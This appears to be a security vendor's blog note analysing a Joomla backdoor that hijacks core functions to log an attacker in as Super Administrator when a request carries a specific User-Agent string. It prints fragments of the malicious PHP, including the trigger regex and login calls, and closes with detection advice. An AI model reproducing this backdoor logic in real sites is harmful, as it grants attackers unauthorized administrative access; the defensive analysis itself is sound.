Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Every day we analyse hundreds of new malicious files. Some of them are simple backdoors, injected iframes, or one liner defacements.

Another type of malware, equally interesting, are the ones that interact with authentication interfaces. These malicious codes may allow attackers to log-in with a particular set of bogus credentials or completely circumvent security measures implemented to prevent unauthorized access to the back-end.


In this note, I will describe how an attacker cleverly hijacked core functions of the Joomla CMS to connect to the database of the website, select user with specific privileges and bypass the authentication mechanism based on an User Agent.

As we mentioned above, the condition for the bypass to happen is if they use a specific User Agent when performing the request:

$ref = $_SERVER['HTTP_USER_AGENT'];
$keywordsRegex = "/AtOPvMzpDosdPDlkm3ZmPzxoP/i";
if (preg_match($keywordsRegex, $ref)) {

The file can remain under the radar as it has no base64 encoding or any other obfuscation inside. It uses standard core functions, normal SQL query and no fuzzy strings.

The bypass itself is pretty straight forward - it calls the "JPluginHelper::importPlugin('user');" core function and scans the database for the "Super Administrator" user role in the "usertype" column of the "users" table. It also takes into account the Joomla version due to some changes in the authentication mechanism:

if (version_compare(JVERSION, '1.6.0', 'ge')) {
       $result = $mainframe->triggerEvent('onUserLogin', array(array('username' => $result->username), array('action' => 'core.login.admin')));
   } else {
       $result = $mainframe->triggerEvent('onLoginUser', array(array('username' => $result->username), array()));
   }

If the above SQL query returns valid results, it prints that the operation was successful and the attacker have successfully logged in to the compromised Joomla website:

Print 'Joomla Login Successful.';

The match string is used by several Web shells on the Internet. Its even used for so called WordPress root kit so it is good idea to scan your files for the UA match string and remove any files that have it inside, or if you are unsure what to do you can trust the Security engineers at https://sucuri.net/ for checking, clearing and protecting your website from malicious code.